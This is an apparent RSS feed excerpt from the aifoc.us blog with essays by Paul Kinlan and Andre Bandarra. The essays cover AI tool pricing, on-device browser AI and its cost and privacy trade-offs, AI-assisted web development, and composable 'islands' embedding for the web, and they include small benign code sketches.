<p>Today, there is a lot of experimentation by the model providers in pricing models, with Pro and Ultra plans. I could imagine a world where some of the current AI Web APIs (like Summarize or Prompt) don&rsquo;t actually use the on-device model, but instead the browser recognizes that the user has a Pro account with a model provider and uses that to process the request. It&rsquo;s still moving the token cost of the LLM from the site owner to the user, but it&rsquo;s wrapped up in a more traditional billing model that the user understands. And with the added benefit that the results are higher quality because the models are significantly more capable than the on-device models.</p>
<p>Billing models for services aside, a bigger change that we are seeing is that for the first time in a long time the tools that we (Web Developers) use every day now have a cost tied directly to their usage and this is a huge change from the past.</p>
<p>I&rsquo;m old enough to remember buying Visual C++ so that I could build Windows apps with MFC (I lied a bit here, my Dad bought it for me). Visual Studio with MSDN was my next mainstay for professional development. These tools cost real money, but it was either a very expensive one-time purchase or an annual subscription (anyone remember the mounds of MSDN CDs?). Whether driven by Open Source, or tools coming in to the browser or just plain competition, Web Developers transitioned to expect that development environments and tool chains would be free (as in beer), or so low-cost that the price was negligible.</p>
<p>But this is changing in subtle ways. We are seeing an explosion of token-slinging services that cost significant amounts of cash. Cursor costs $20 a month for 500 requests (I think I get through 500 requests in a day sometimes.) Replit is per &ldquo;checkpoint&rdquo; and is <a href="https://blog.replit.com/effort-based-pricing">now adapting to &ldquo;effort&rdquo; based billing</a>. I find the effort-based billing particularly offensive because it assumes that they know they&rsquo;ve completed a goal, and when the tool makes clear mistakes it&rsquo;s incredibly frustrating. And then there are the purely token-processing tools like Cline and others. As I write this, there are now a number of CLI tools (<a href="https://github.com/google-gemini/gemini-cli">Gemini</a>, <a href="https://openai.com/index/introducing-codex/">Codex</a> and <a href="https://www.anthropic.com/claude-code">Claude</a>) that are exploring being able to attach their tool directly to your consumer account (Ultra accounts get more requests than Pro, and so on).</p>
<p>This entire space is a difficult set of trade-offs for web developers. You can feel incredibly productive and can see the output of it, and when things are going well, you don&rsquo;t want to stop. But at some point, you have to pay or stop. So, what do you do? You can look at cheaper models, or you can think about going <a href="/on-device">on-device</a> as a way to keep the cost down. Are you really trading cost for quality, though? How can you even determine quality other than vibes? This was the only reason I switched to Gemini Pro. The code felt better but I didn&rsquo;t have a real way of actually comparing it and I don&rsquo;t believe any of the benchmarks.</p>
<p>I don&rsquo;t know a single developer who today wants to produce a low-quality product or knowingly use a tool that outputs lower-quality code than another. Being able to determine this though is a real challenge and one that will increase as more developers find value in these tools.</p>
<p>Maybe this is just the same as picking a framework to use? You make a subjective decision in the guise of objective criteria: There are more developers, there are more libraries, my team will be more productive, etc etc.</p>
<p>I have a job that enables me to spend what I want to spend and see the benefits from it, but for a small individual developer or a small software shop, even $10 a day is a lot of money, and can equate to less than an hour of LLM usage. So how should we think about our more junior folk or people starting out in the industry who don&rsquo;t have access to the funds to use these tools?</p>
<p>How do we think about emerging or weaker economies? Tokens aren&rsquo;t priced to the market they are being used in, they are attached to the dollar. If you&rsquo;re in a region that has lower salaries, lower revenues or has a currency that isn&rsquo;t as strong against the dollar, then you might struggle to be able to afford to use these tools even if the increase in productivity is significant.</p>
<p>We never did get out of the model that App Engine introduced. AWS just took it and made it number of requests <em>and</em> CPU time (GB seconds). Now, LLMs are doing the same thing but this time to the actual development costs and there might be an ever widening gap between those who can afford to use LLMs and those who can&rsquo;t.</p>
<p>These are all very interesting problems that we as a web industry will need to solve.</p>
]]></content:encoded></item><item><title>on-device</title><link>https://aifoc.us/on-device/</link><pubDate>Thu, 12 Jun 2025 23:00:00 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/on-device/</guid><description>&lt;p>The web browser is such an amazing concept. From the very first moment I used one, right up until today. You type in a URL and you can have something run on the server and then displayed in the browser. It got me hooked in 95, and keeps me hooked today. Back in the day, Perl was my jam. I loved to create login systems, e-commerce sites, email hosting providers. You name it, I could get the server to mash out HTML like nobody&amp;rsquo;s business.&lt;/p></description><content:encoded><![CDATA[<p>The web browser is such an amazing concept. From the very first moment I used one, right up until today. You type in a URL and you can have something run on the server and then displayed in the browser. It got me hooked in 95, and keeps me hooked today. Back in the day, Perl was my jam. I loved to create login systems, e-commerce sites, email hosting providers. You name it, I could get the server to mash out HTML like nobody&rsquo;s business.</p>
<p>When I was 17 I started a company called PCBware in the UK with two of my friends Chris and Ben. We were directors of a company and we felt like we could do anything&hellip; we even had a domain name! And what we thought was an awesome company name. It wasn&rsquo;t until someone said it sounded like you should be scared of PCs that we had some second thoughts.</p>
<figure><img src="/images/pcbware.png"
    alt="Earliest image I can find of PCBware&rsquo;s homepage in 1998"><figcaption>
      <p>Earliest image I can find of PCBware&rsquo;s homepage in 1998</p>
    </figcaption>
</figure>

<p>As we got more confident building software on the web and wrestling with Apache to automate the creation of websites, we morphed it into a hosting company that made it so that businesses could create a site quickly and have a presence online. I&rsquo;ve got fond memories of that time, the company (at least when I was there) was not successful, but it was a time when I could just focus on building&hellip; We timed it just right to jump on the web.</p>
<p>The web had this very clear separation, logic ran on the server and you presented it in the UI. We&rsquo;d played around with JavaScript, JScript and DHTML, but the majority of what we would do in the client was rollover effects on images and some basic UI validation. All I wanted though was to be able to do more in the browser. Many of our potential customers wanted the page never to refresh. But many of the fundamental technologies and best practices just didn&rsquo;t exist at the time. <a href="https://en.wikipedia.org/wiki/XMLHttpRequest">XMLHttpRequest</a>&hellip; That&rsquo;s two years away!</p>
<p>While I was &ldquo;running&rdquo; the company, I was also at university (Hello to my John Moores friends!) and the email system they had was <a href="https://en.wikipedia.org/wiki/Outlook_on_the_web">Outlook</a>. I didn&rsquo;t have Outlook on my personal machine, but I did have a browser. I remember logging into it for the first time and boop! an email just appeared in my inbox&hellip;. I didn&rsquo;t refresh. What is this magic!?</p>
<p>There have been more seminal moments for me on the Web. Gmail. Google Maps. Google Docs multi-user. That early 2000s period changed what we expected of the web: it was the combination of on-server and on-device execution, and the expectation of interactivity locally in the browser has not stopped. Today we are able to store data sandboxed inside the origin, run applications completely offline, install them on to the device, access hardware on the user&rsquo;s device and now run &ldquo;Machine Code&rdquo; via WASM and GPU shaders.</p>
<p>This progression is interesting to me because the story is less about the raw technology and instead more of the change that it enables to the ecosystem. Yes, the web-runtime wasn&rsquo;t as fast as some app experiences, so you might never ship your AAA game on the web, but the performance of devices was never a reason not to do on-device for the vast majority of experiences and we&rsquo;ve got all manner of experiences now running in the browser, all the way up to Photoshop. All of the <a href="https://paul.kinlan.me/slice-the-web/">SLICE</a> principles are what makes the web the best platform to deploy on.</p>
<p>As I noted in <a href="https://aifoc.us/transition/">transition</a>, I&rsquo;d tracked on-device AI for some time because of projects like <a href="https://ai.google.dev/edge/mediapipe/solutions/setup_web">MediaPipe</a> and <a href="https://www.tensorflow.org/js">TensorFlow.js</a>. It was incredibly neat to see real-time image segmentation etc, but it wasn&rsquo;t until ChatGPT launched that I dusted off my old machine-learning books and got back into thinking about what might be possible in the browser. I went off and explored the ecosystem. I built a <a href="https://paul.kinlan.me/button-detector/">button detector using TFLite</a>&hellip; and it was incredibly exciting, with new classes of apps available to people all inside the browser, and I realised that we&rsquo;re at a new tipping point in capability for the browser and what it can enable for people.</p>
<p>The web has always been an amazing ground for experimentation, I think it&rsquo;s due to the comparative ease of getting something running and sharing it with people. AI based experiments are no different, there are so many different ways to think about what on-device can mean, for example:</p>
<ol>
<li>Using a framework like TFLite, ONNX or <a href="https://huggingface.co/docs/transformers.js/en/index">Transformers.js</a> to load a custom model and run it in the browser, either via WASM or WebGPU.</li>
<li>The in-development <a href="https://webmachinelearning.github.io/webnn-intro/">WebNN</a> APIs that will in theory let you load and execute models in a standardised way against the hardware that the user has.</li>
<li>The <a href="https://developer.chrome.com/docs/extensions/ai/prompt-api">experimental prompt based APIs in Chrome</a> that are now multi-modal and let you have instant access to models like Gemini Nano or Phi.</li>
<li>Built-in APIs, like <a href="https://developer.chrome.com/docs/ai/built-in">Chrome&rsquo;s use-case based APIs</a> (Summarize, Write, Rewrite), that do common tasks without having to download a model or even think about AI at all.</li>
<li>Accessing a local server that hosts models, like <a href="https://ollama.com/">Ollama</a>.</li>
<li>Accessing OS-provided models (like what <a href="https://machinelearning.apple.com/research/apple-foundation-models-2025-updates#:~:text=Server%20foundation%20models.-,Foundation%20Models%20Framework,-The%20new%20Foundation">Apple just announced</a>).</li>
</ol>
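<p>A page can probe for several of these options before deciding what to do. The sketch below is feature detection only. It assumes the global names <code>Summarizer</code> and <code>LanguageModel</code> for Chrome&rsquo;s built-in APIs and <code>navigator.ml</code> for WebNN, all of which are experimental and may change or differ between browsers, and <code>detectOnDeviceOptions</code> is a made-up helper name:</p>

```javascript
// Reports which on-device routes look available in the given global scope.
// The API names checked here are assumptions based on current experimental
// browser builds, so treat a `true` as "worth trying", not a guarantee.
const detectOnDeviceOptions = (scope = globalThis) => {
  const nav = scope.navigator ?? {};
  return {
    builtInSummarizer: "Summarizer" in scope, // use-case based built-in API
    builtInPrompt: "LanguageModel" in scope, // prompt based built-in API
    webnn: "ml" in nav, // in-development WebNN entry point
    webgpu: "gpu" in nav, // GPU access for bring-your-own runtimes
    wasm: typeof scope.WebAssembly === "object", // CPU fallback runtime
  };
};

console.log(detectOnDeviceOptions());
```

<p>Detection says nothing about model quality or download size, so it is a starting point for choosing a route rather than the decision itself.</p>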
<p>If I look at this list and go bottom to top, it seems to me that every operating system will come with a framework to load and run models, likely preferring its own models by default. The ease of development for these local OS models combined with the models &ldquo;just being available&rdquo; will put pressure on tools like Ollama, which I suspect are in the process of being sherlocked (sher_llm_ocked?). The question for me is: will these OS foundational systems allow for model choice, either by the developer or the user? Given the lock-in we&rsquo;ve seen in the past, I suspect they won&rsquo;t, and I can&rsquo;t see a world where a regular person will install model-picker middleware.</p>
<p>If the browser has built-in APIs there&rsquo;s a similar tension. The browser can provide its own model, which is what we see happening now, or if the OS has one, it might be able to defer to that. I suspect each browser vendor will want you to use their model.</p>
<p>If you want true customization, or want to do things that aren&rsquo;t built in, then you are going to have to ship your own models to the client and either use browser-provided APIs like WebNN or bring your own runtime (with WASM). This clearly has the most flexibility and a different set of tradeoffs. You have to download the model for each site (we don&rsquo;t have a large-object caching model for the web) and hope that there are APIs for hardware acceleration. I expect that people will pioneer new models and capabilities here, and once these become common use-cases they will then be built into the browser or the operating system.</p>
<p>As I explored these different classes of on-device inference and why you (a developer) would want them to be on-device, the answers tended to lean into the same areas that we&rsquo;ve been talking about for years on the web in relation to locally running experiences:</p>
<ul>
<li>They work offline. No connection required. Once you have the model you can just use it.</li>
<li>They are private. The data never leaves the device, so you don&rsquo;t have to worry about it being sent to a server and a company using your data to train their models (whether you believe their license or not)</li>
<li>They can be used in real-time scenarios where the round trip to a server would be too slow. For example, you can use on-device inference to do real-time image processing, speech recognition, or even text generation.</li>
</ul>
<p>But after speaking to a lot of businesses and developers there is something that I&rsquo;ve not really heard before for most on-device scenarios: Cost! Running models on-device can lower the cost for the business running the site. Specifically, tokens can be expensive depending on the model and the number of users you have, so if the business no longer has to pay for server costs to run the inference, that is a huge benefit.</p>
<p>Cost just hasn&rsquo;t been a thing that <em>I&rsquo;ve</em> seen really talked about when it comes to web experiences. Instead the narrative is about privacy, ownership of data and compute, resilience to the network, resilience to business failure, avoidance of big-tech etc. All of these are great reasons to build local-first. Cost as a factor in running models, and specifically LLMs, is I think a new vector worth looking at to see some of the challenges that we might face as an industry.</p>
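<p>To put rough numbers on the cost argument, here is a back-of-the-envelope sketch in TypeScript. Everything in it is an assumption for illustration: the <code>Usage</code> shape, the function names and any figures you feed it are hypothetical, not real prices or traffic.</p>
<pre><code class="language-typescript">// Illustrative only: the inputs are made-up assumptions, not real prices or traffic.
interface Usage {
  users: number;                 // people using the feature each month
  requestsPerUser: number;       // inference requests per user per month
  tokensPerRequest: number;      // prompt plus response tokens
  pricePerMillionTokens: number; // in whatever currency the provider bills
}

// What the business would pay if every request ran on a hosted model.
function monthlyServerCost(u: Usage): number {
  const tokens = u.users * u.requestsPerUser * u.tokensPerRequest;
  return (tokens / 1000000) * u.pricePerMillionTokens;
}

// onDeviceShare is the fraction (0 to 1) of requests served on-device instead.
function monthlySaving(u: Usage, onDeviceShare: number): number {
  return monthlyServerCost(u) * onDeviceShare;
}
</code></pre>
<p>With made-up inputs of 10,000 users, 20 requests each a month, 1,500 tokens per request and a price of 2 per million tokens, <code>monthlyServerCost</code> comes to 600 a month; serving half of those requests on-device would save 300 of it.</p>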
<p>Depending on what you are doing, the models that you run on-device can be worse in both quality and performance. As a developer you are going to have to be responsible and decide where to make the trade-off: the cheaper (for your business) model, or the quality of the answer? It will be impossible for a user to make a rational and informed decision about where to run the compute, so the natural thing that you might do as a developer is to have a router that looks at the query and determines the best place to run it. If you need a high-quality answer, route it to the server. If you want low cost, keep it on device. If the user&rsquo;s device can&rsquo;t handle it, bump it to the cloud. It gets complex very quickly, and has a couple of further issues that will need to be dealt with.</p>
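<p>The three routing rules above can be sketched in a few lines of TypeScript. This is a minimal illustration, not a recommendation: the <code>Query</code> and <code>Device</code> shapes, the field names and the token threshold are all hypothetical, and a real router would need far better signals than these.</p>
<pre><code class="language-typescript">// Hypothetical sketch: every name and threshold here is an assumption for illustration.
type Target = "device" | "cloud";

interface Query {
  needsHighQuality: boolean; // the caller has decided answer quality matters most
  estimatedTokens: number;   // rough size of the prompt plus expected output
}

interface Device {
  hasLocalModel: boolean;    // an on-device model is downloaded and ready
  maxLocalTokens: number;    // largest job we trust this device to handle
}

function route(query: Query, device: Device): Target {
  // If the user's device can't handle it, bump it to the cloud.
  if (!device.hasLocalModel) return "cloud";
  if (query.estimatedTokens > device.maxLocalTokens) return "cloud";
  // If you need a high-quality answer, route it to the server.
  if (query.needsHighQuality) return "cloud";
  // Otherwise keep it on device, which is the low-cost option.
  return "device";
}
</code></pre>
<p>For example, a small query with no quality requirement on a capable device, such as <code>route({ needsHighQuality: false, estimatedTokens: 200 }, { hasLocalModel: true, maxLocalTokens: 1000 })</code>, stays on <code>"device"</code>. Even this toy version shows how quickly the decision table grows once you add more signals.</p>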
<p>Web developers don&rsquo;t yet have the tools, or at least they are not yet in our workflows, to benchmark model quality against cost and performance. There are some tools like Simon Willison&rsquo;s <a href="https://www.llm-prices.com/">llm-prices</a>, but there needs to be a lot more tooling to help us navigate this space. We need to be able to track the quality of the output of the models, the costs, the latency, and, if we&rsquo;ve learnt anything from npm, when the version changes. For example, the models in Chrome&rsquo;s on-device APIs - be it the <a href="https://developer.chrome.com/docs/ai/prompt-api">prompt API</a> or the <a href="https://developer.chrome.com/docs/ai/built-in">built-in use-case APIs</a> - hide the model version information from the developer and the user. The model can and will update as we make the models better (check <code>chrome://components</code> and you will see the version information), so how do you manage this in a production environment?</p>
<p>On top of this, when developers and businesses market on-device anything, they normally say that because the data, the storage and the computation are on the user&rsquo;s device it&rsquo;s inherently more secure and more private. This is certainly true when we have the capabilities to run everything on device, however we now have performance and memory requirements that render potentially billions of devices unable to run models performantly (or at all) on-device. I&rsquo;m comfortable: I have a couple of beefy Macs that can sling tokens about. But what if you are someone that has to use a candy-bar phone? The spirit of the web is that everything that is on a URL is accessible irrespective of your device capabilities.</p>
<p>People are putting real and sensitive data into these tools, so if we are going to promote on-device as a real thing then we need to do one of two things. Either we change the social contract with people, so that if the marketing about your site says that the computation is done on device, then you can&rsquo;t (or shouldn&rsquo;t) be sending the data to a hosted service; or we go further and enable the platform to make the input and output to models more opaque. Unfortunately, a web super-power, the origin model, is no help here. The origin model is great in that it stops other sites peeking into the data held on your site, but there is no guarantee that the data won&rsquo;t leave your device because the site owner programmed it that way. Observant readers might say &ldquo;Paul, this issue isn&rsquo;t about LLMs, it&rsquo;s been an issue for years&rdquo;, and you are correct. It&rsquo;s just that I don&rsquo;t think anyone has really considered it that much, and I think that given how some of our engagement might change, we should at least consider changes. Maybe something similar to CSP and opaque fetches, plus tainting of the data (like Canvas) when you get a response from an LLM, might help (i.e., you get a warning if the data is sent via a fetch, or the user could block requests in the user-agent), or even <a href="https://www.w3.org/TR/webcrypto-2/#cryptokey-interface-internal-slots">opaque objects like those defined by the WebCrypto API</a>, or even something like <a href="https://security.apple.com/documentation/private-cloud-compute">Apple&rsquo;s Private Cloud Compute</a> built into the platform. I don&rsquo;t actually know what the answer is here but it feels like something that would need more investigation because of the pressures developers will have to move compute off the device.</p>
<p>The web is the perfect medium to offer these types of experiences. If we assume that this technology is better for people, making them more efficient or enabling new workflows, then it should be available to everyone irrespective of location or device class, enabling new classes of computing all via the browser. To get there, we are going to have to deal with the fact that hybrid approaches will be required for a long time.</p>
<p>I love doing more directly in the browser, and I can&rsquo;t wait to see what new use cases open up, just like we saw when Outlook came to the web, or Gmail, or Google Docs, and countless other innovations that were enabled by new APIs&hellip; There&rsquo;s going to be a lot to work out still.</p>
]]></content:encoded></item><item><title>AI Assisted Web Development</title><link>https://aifoc.us/ai-assisted-webdev/</link><pubDate>Wed, 04 Jun 2025 16:00:06 +0000</pubDate><author>contact@aifoc.us (Andre Cipriani Bandarra)</author><guid>https://aifoc.us/ai-assisted-webdev/</guid><description>&lt;p>AI assisted programming is becoming more and more frequent amongst developers. Its usage ranges from asking AI tools like Gemini and pasting answers into the IDE, to using AI as a glorified auto complete, to full on vibe coding, delegating most of the code written to AI agents.&lt;/p>
&lt;p>Models are getting more capable, but are still not perfect. Developers are still ultimately responsible for the code produced, and should review it before publishing to avoid &lt;a href="https://futurism.com/problem-vibe-coding">nasty surprises&lt;/a> like &lt;a href="https://x.com/leojr94_/status/1901560276488511759">leaking API keys&lt;/a>. But it&amp;rsquo;s amazing to see how models like &lt;a href="https://deepmind.google/models/gemini/pro/">Gemini 2.5 Pro&lt;/a> are capable of building entire (even if reasonably simple) web applications from a one shot prompt, like &lt;a href="https://g.co/gemini/share/fec5ce76d958">this example&lt;/a> where my prompt was &lt;em>Build a force directed graph demo&lt;/em>.&lt;/p></description><content:encoded><![CDATA[<p>AI assisted programming is becoming more and more frequent amongst developers. Its usage ranges from asking AI tools like Gemini and pasting answers into the IDE, to using AI as a glorified auto complete, to full on vibe coding, delegating most of the code written to AI agents.</p>
<p>Models are getting more capable, but are still not perfect. Developers are still ultimately responsible for the code produced, and should review it before publishing to avoid <a href="https://futurism.com/problem-vibe-coding">nasty surprises</a> like <a href="https://x.com/leojr94_/status/1901560276488511759">leaking API keys</a>. But it&rsquo;s amazing to see how models like <a href="https://deepmind.google/models/gemini/pro/">Gemini 2.5 Pro</a> are capable of building entire (even if reasonably simple) web applications from a one shot prompt, like <a href="https://g.co/gemini/share/fec5ce76d958">this example</a> where my prompt was <em>Build a force directed graph demo</em>.</p>
<p>One thing to note, however, is that AI models are not equally performant for all programming languages and stacks. Because model performance depends on the availability of training data, AI models tend to be quite good at web development, and have the potential to boost the productivity of web developers more than that of developers on other stacks.</p>
<p>Maybe that&rsquo;s because the web has been around for such a long time and, given the open nature of web implementations, there is plenty of training data available for web development. Another characteristic that favours the web is that it excels in backward compatibility (remember <a href="https://www.spacejam.com/1996/">spacejam.com</a>, from &lsquo;96? It&rsquo;s still up and running), so even when a model produces slightly outdated code, it will generally still work without issues.</p>
<p>Another point that makes the web a great platform to build with AI tooling is low-friction deployment. Because the web doesn&rsquo;t have review queues or requirements, developers can easily deploy their creations, iterate, and share them.</p>
<p>The combination of AI models&rsquo; web development capabilities with the lack of friction for deploying the results is spurring a new type of developer, one that is first and foremost a vibe coder and frequently doesn&rsquo;t know other types of development.</p>
<p>This became clear to me when chatting with the founders of <a href="https://www.usecurling.com/">usecurling.com</a>, a Brazilian startup aiming at differentiating themselves by delivering products faster by using AI. The team there also hosts a closed vibe coding community where the vast majority of participants don&rsquo;t have a software development background, but are using tools like <a href="https://replit.com/">Replit</a> and <a href="https://lovable.dev/">Lovable</a> to build projects.</p>
<p>What those developers can achieve is, of course, limited to what the AI model can do. The team reported that those developers will often run into brick walls, either because they aren&rsquo;t able to get the AI tooling to implement what they want or because they run into issues, like security or scalability, when productionizing them.</p>
<p>And that&rsquo;s where their community comes in: it&rsquo;s a forum where the Curling AI team, who are experienced developers, can help vibe coders overcome those issues.</p>
<p>AI tooling does indeed lower the barrier of entry for web development, allowing people who otherwise wouldn&rsquo;t have the time or resources to learn to effectively realize their ideas. It also doesn&rsquo;t mean there will be less work for traditional developers. In fact, my view is quite the opposite. With a lower barrier of entry, the need for developers who can take over when AI tooling hits a brick wall will only grow.</p>
<p>Another interesting trend is developers who moved into leadership or management positions, like CTOs, VPs, directors and managers, starting to build again, because AI tooling gives them the opportunity to quickly put together projects within the time they have left after dealing with the other responsibilities that come with those roles.</p>
<p>While, on the one hand, this may be contributing to a <a href="https://leaddev.com/technical-direction/why-developers-and-their-bosses-disagree-over-generative-ai">dissonance between leadership and developers on generative AI</a>, it&rsquo;s also great to see AI bringing those developers back to building things, and excited about the future of web development.</p>
<p>A URL is a powerful tool for sharing web projects. With more people becoming developers and publishing their creations online, I wonder if we will start seeing more directories where those developers can showcase their applications, and users can discover new ones - sort of an <a href="https://itch.io">itch.io</a>, but for web applications.</p>
<p>Maybe this won&rsquo;t make sense in today&rsquo;s world, but the concept of more people being able to transform their ideas into web applications, with reduced friction to build and deploy, reminds me of the early days of the web - distribution of native applications was always an issue, but the web allowed developers to share their creations with a simple link. AI Tooling is changing that by allowing more people to become developers, and that&rsquo;s great!</p>
]]></content:encoded></item><item><title>embedding</title><link>https://aifoc.us/embedding/</link><pubDate>Wed, 28 May 2025 10:59:06 +0000</pubDate><author>paul@aifoc.us (Paul Kinlan)</author><guid>https://aifoc.us/embedding/</guid><description>&lt;p>No, not that &lt;a href="https://huggingface.co/spaces/hesamation/primer-llm-embedding">one&lt;/a>. The E in &lt;a href="https://paul.kinlan.me/slice-the-web/">SLICE&lt;/a> is for embedding content&amp;hellip;. Oh wait, that E was for ephemeral. Hmm, never mind. I guess this is the other E which is actually the C in SLICE. &amp;ldquo;Composable&amp;rdquo;. After &lt;a href="https://aifoc.us/a-link-is-all-you-need">linking&lt;/a> composability is one of the most critical features of the medium that is the web. It&amp;rsquo;s the only platform that I know of that enables expression by integrating live content from nearly any other site or service directly into the UI. Yes, we have APIs, but it&amp;rsquo;s the &lt;code>&amp;lt;iframe&amp;gt;&lt;/code> and &lt;code>&amp;lt;embed&amp;gt;&lt;/code> that have helped to make the web unique.&lt;/p></description><content:encoded><![CDATA[<p>No, not that <a href="https://huggingface.co/spaces/hesamation/primer-llm-embedding">one</a>. The E in <a href="https://paul.kinlan.me/slice-the-web/">SLICE</a> is for embedding content&hellip;. Oh wait, that E was for ephemeral. Hmm, never mind. I guess this is the other E which is actually the C in SLICE. &ldquo;Composable&rdquo;. After <a href="/a-link-is-all-you-need">linking</a> composability is one of the most critical features of the medium that is the web. It&rsquo;s the only platform that I know of that enables expression by integrating live content from nearly any other site or service directly into the UI. Yes, we have APIs, but it&rsquo;s the <code>&lt;iframe&gt;</code> and <code>&lt;embed&gt;</code> that have helped to make the web unique.</p>
<p>There&rsquo;s a story that I heard before joining Google, that our very first developer API was a way to embed Google Maps into your website. It wasn&rsquo;t that we invented an API, it was that the web made it easy to pull content from other sites and embed it into your own and lots of people wanted to do this. While embedding of maps is declining (according to BuiltWith), anywhere between <a href="https://trends.builtwith.com/mapping/Google-Maps">12-15% of the top 1 million sites</a> still embed Google Maps.</p>
<p>In &ldquo;<a href="/a-link-is-all-you-need/">A link is all you need</a>&rdquo; and <a href="/super-apps/">super-apps</a> I touched on the ability for LLMs to create or recall content on the fly and how it&rsquo;s potentially a huge shift for how we think about the web. In <a href="/ai-powered-site-mashups/">AI-powered site mashups</a> Andre Bandarra suggests that Agents will be able to create the ultimate mashup of sites and services because they attempt to solve for the user&rsquo;s goal.</p>
<p>If the only thing really stopping this is the <a href="/latency/">latency</a> of the LLMs to generate the UI then it is a &ldquo;when&rdquo; and not &ldquo;if&rdquo; question. We really need to think about some of the downstream implications of this.</p>
<p>One extreme is where there is a <a href="/super-apps/">super-app</a> and it is the agent that can do everything for the user, generating content and UIs on the fly to fulfil a goal. Where does the web sit in this? The web is a legacy fallback and it&rsquo;s not the web I want to see. Is there a possibility that an exchange of value could happen between the site and super-app? I believe that many site owners and businesses would want some way of keeping their brand, or enabling specific actions like up-sell on checkouts, so could we embed some functionality that brings my brand or service in front of the user in any site or app, including the super-app? Maybe it&rsquo;s a checkout form, or a registration page, or, well anything that needs a user-action.</p>
<figure><img src="/images/embedding.png"
    alt="Embedding"><figcaption>
      <p>Fictional example of embedding existing web functionality into a &lsquo;chat app&rsquo;</p>
    </figcaption>
</figure>

<p>In 2020, while on my team, Jason Miller documented the <a href="https://jasonformat.com/islands-architecture/">Islands architecture</a> (first proposed by <a href="https://sylormiller.com/">Katie Sylor-Miller</a>). At the time it felt like a logical extension to &ldquo;<a href="https://web.dev/learn/pwa/architecture/">AppShell</a>&rdquo;: here&rsquo;s some static code and here&rsquo;s the dynamic bit. On a technical level that <em>is</em> what it describes, but at an architectural level it is something rather different. Islands are a way to think about how to compose your web app into different bits of functionality. While frameworks like <a href="https://fresh.deno.dev/docs/concepts/islands">Fresh</a> and <a href="https://docs.astro.build/en/concepts/islands/">Astro</a> have adopted this idea, it is still nascent: it&rsquo;s just a framework-level concept and not a platform-level primitive.</p>
<p>When I look at the extreme that is &ldquo;the super-app&rdquo;, it feels like embedding and composability need to be key parts of the future of the web, and they need to be something that developers and businesses can opt in to, keeping control of their brand and experience to as great an extent as possible.</p>
<p>Now there is a natural reaction: Well, I don&rsquo;t want super apps or LLMs. The technology is now here and it&rsquo;s being used for good and for bad, and as I learnt from the desktop to mobile <a href="/transition/">transition</a>, the answer is to differentiate and not follow. Lean in to the areas that other platforms can&rsquo;t compete on.</p>
<p>So, how does the web differentiate then?</p>
<p>One area that is ripe for innovation is the act of hyper-linking. We should actively investigate hyper-embedding (also known as transclusions). That is, we need to go beyond just being able to embed a site in a page (<code>iframe</code>) or an API (<code>fetch()</code>), or just merely linking to something (<code>&lt;a&gt;</code>), but instead enable the seamless embedding of functionality that is useful and composable and secure.</p>
<p>The boundary between functional components as described in islands offers so many opportunities for the web. By exposing islands/components/widgets to the browser in a way that it understands that a) there is something that is embeddable, b) what it can do, and c) how to talk to it, all while ensuring there can be security and privacy boundaries between the islands if required, could enable:</p>
<ol>
<li>A cleaner separation for site authors. They could define islands of functionality once, use them across their current sites, and then render them in the page. Because the browser understands the intent of islands, it enables page-level actions, automations, and chat-bots by the browser to help the user interact with the page.</li>
<li>Deeper integrations across sites. Developers have a habit of injecting any and all 3P JS into the page. A new primitive could separate the pages, ensure memory safety, and prevent data leakage while enabling even more composability across sites.</li>
<li>Native apps, or other agents, could load these islands from other sites and then render just the island inside their app.</li>
<li>There could be a marketplace and discovery mechanism for functionality for any given island&rsquo;s intent and any given contract.</li>
</ol>
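<p>Purely to make points a), b) and c) concrete, here is what a description of an embeddable island <em>might</em> look like, written as a TypeScript type. Nothing here is a real or proposed web platform API: <code>IslandDescriptor</code>, its fields and <code>findIslands</code> are hypothetical names invented for this sketch.</p>
<pre><code class="language-typescript">// Hypothetical: none of these names exist in any browser or specification.
interface IslandDescriptor {
  src: string;        // (a) there is something embeddable, and this is where it lives
  intent: string;     // (b) what it can do, for example "checkout" or "map"
  messages: string[]; // (c) how to talk to it: the message names it accepts
  isolated: boolean;  // whether a security and privacy boundary is required
}

// A browser, agent or marketplace could look up islands by the intent they serve.
function findIslands(islands: IslandDescriptor[], intent: string): IslandDescriptor[] {
  return islands.filter((island) => island.intent === intent);
}
</code></pre>
<p>The interesting part is not the shape itself but that the intent and the contract are declared up front, so something other than the page author can discover and use them.</p>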
<p>This might sound like Web Components, but we don&rsquo;t have clear contracts or cross-platform embed-ability. It&rsquo;s something that I started to think about in <a href="https://paul.kinlan.me/custom-elements-ecosystem/">Custom Elements Ecosystem</a> but at the time there wasn&rsquo;t a clear need for it. Now there is.</p>
<p>It might also sound like an <code>&lt;iframe&gt;</code>, but these are too heavy. I might just want to embed a small bit of functionality like a checkout form, or a map that has all my own branding.</p>
<p>It might also sound like the <code>&lt;portal&gt;</code> element which was meant as a more privacy-preserving <code>&lt;iframe&gt;</code> element, but again it&rsquo;s too high-level and doesn&rsquo;t allow for the embedding of functionality at a level smaller than a page.</p>
<p>It might also look like <a href="https://paul.kinlan.me/what-happened-to-web-intents/">Web Intents</a>, but that worked at the page level and not at the component level (and it got pulled out of Chrome).</p>
<p>We are at the start of an era where the <a href="https://paul.kinlan.me/the-headless-web/">web will be headless</a> <em>and</em> we don&rsquo;t have the correct primitives to enable the web to be composable in a way that is useful and lets it thrive.</p>
<p>It&rsquo;s too early to prescribe solutions, but I do believe that we need a way to define &lsquo;islands&rsquo; or web components as embeddable, and a way to embed sub-trees and components (islands). As we do that, I think it&rsquo;s time again to think about exposing intents and contracts on sites, pages and components and making them discoverable.</p>
<p>My hope is that the designers of the web platform, that is browser vendors and participants of the W3C, are imagining what the platform could and should look like and how it should continue to differentiate itself in the future. These are just a couple of early opportunities that I see.</p>
]]></content:encoded></item><item><title>Mashups 2.0</title><link>https://aifoc.us/ai-powered-site-mashups/</link><pubDate>Sat, 24 May 2025 16:00:06 +0000</pubDate><author>contact@aifoc.us (Andre Cipriani Bandarra)</author><guid>https://aifoc.us/ai-powered-site-mashups/</guid><description>&lt;p>&lt;a href="https://aifoc.us/latency/">Paul Kinlan recently wrote&lt;/a> about how latency of AI models to generate UIs with HTML, CSS and JavaScript is decreasing significantly, and how that can lead to user UIs that are ephemeral, dynamically generated, and specialized to the user need at hand.&lt;/p>
&lt;blockquote>
&lt;p>To me, the direction of travel is clear. UI generation to service user-goals is going to happen.&lt;/p>&lt;/blockquote>
